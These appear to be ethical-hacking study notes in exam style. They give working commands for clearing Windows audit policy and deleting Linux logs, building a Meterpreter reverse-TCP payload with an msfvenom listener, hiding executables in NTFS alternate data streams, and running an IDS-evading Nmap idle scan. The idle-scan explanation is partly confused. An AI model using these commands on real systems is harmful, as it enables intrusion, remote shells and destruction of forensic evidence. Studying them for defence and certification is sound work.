—Windows Auditing
To disable all auditing on a windows machine we can use the CLI add auditpol.exe
auditpol.exe /clear
We can also delete logs on linux
Rm /var/log/messages
Metasploit can also clear logs remotely
—msfvenom and sessions
Because many clients are behind a firewall, we need the client to initiate the session outbound to us
By creating a payload exe file we can create a session to gain access to a computer.
Step 1.
Make sure Metasploit is connected to the Postgres database
db_status
Service postgresql start
msf > msfdb init
- Create the attack filemsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=1234 —format=exe > attack.exe
- Set metasploit to listen on port 1234Use exploit/multi/handlerSet LHOST 192.168.1.1Set LPORT 1234Set payload windows/meterpreter/reverse_tcpRun –
- Once executed on the client machine we can connect to the session
—ADFS Streams
we can hide data in other data so that when an file is opened then an exe
can run.
Step1. Appending the exe to the txt file
type calc.exe > C:\folder\textfile.txt:calc.exe
Step2. Creating an alias
mklink calc.exe C:/folder/textfile.txt:calc.exe
–Grey Hat Hacker
reformed black hat hacker
-Hack Value
An item considered of high value to attack and exploit
—Netcraft
This is a website where you enter a URL and get OS type, services like php
A list of ip addresses,
–Pentesting Senerios
Black Box = No Information is given about the system like ip hostname etc
Grey Box = Partial information is given like IP and Hostname
White Box = All Technical details are provided about the appliance or server
—Download a website
httrack will download a website to your local computer
—Web Data Extractor
Poll a website for sensitive information get things like phone numbers
Email addresses and even passwords
—Email Tracker Pro
Analyse headers in email headers to track down location and SMTP relay
—metagoofil
Poll a website for sensitive information get usernames doc files and more
—Linux
Usernames are stored in the following directory
/etc/passwd
The password is encrypted into a hash in a shadow file
/etc/shadow
The groups are stored in the following directory
/etc/groups
Security permissions
Read write execute (Rwx)User (RWX)Group (RWX) Everyone
Chmod -R 750 FOLDER
—Idle Scan
Lets say you want to scan a list of open ports on a host but you don’t want NMAP to scan because you
Want to hide your private IP and avoid IDS/IPS. The Idle scan works like this in series
- A spoofed ACK from a client to a web server
- Syn-ack gets sent back from the web server to the client
- Send a syn-ack is sent to the client from your attacking machine taking note of the TCP SEQ Number
- A RST is sent back from the client to the attacking machine. If the TCP SEQ is 1 higher
Then no webserver is present on that address. If the REST is +2 higher than the syn-ack
We know that the webserver is listening and sent back a syn-ack
NMAP Command to check all open ports on a host idle scanning
Nmap -Pn -sI 192.168.1.216 -p50-200 192.168.1.212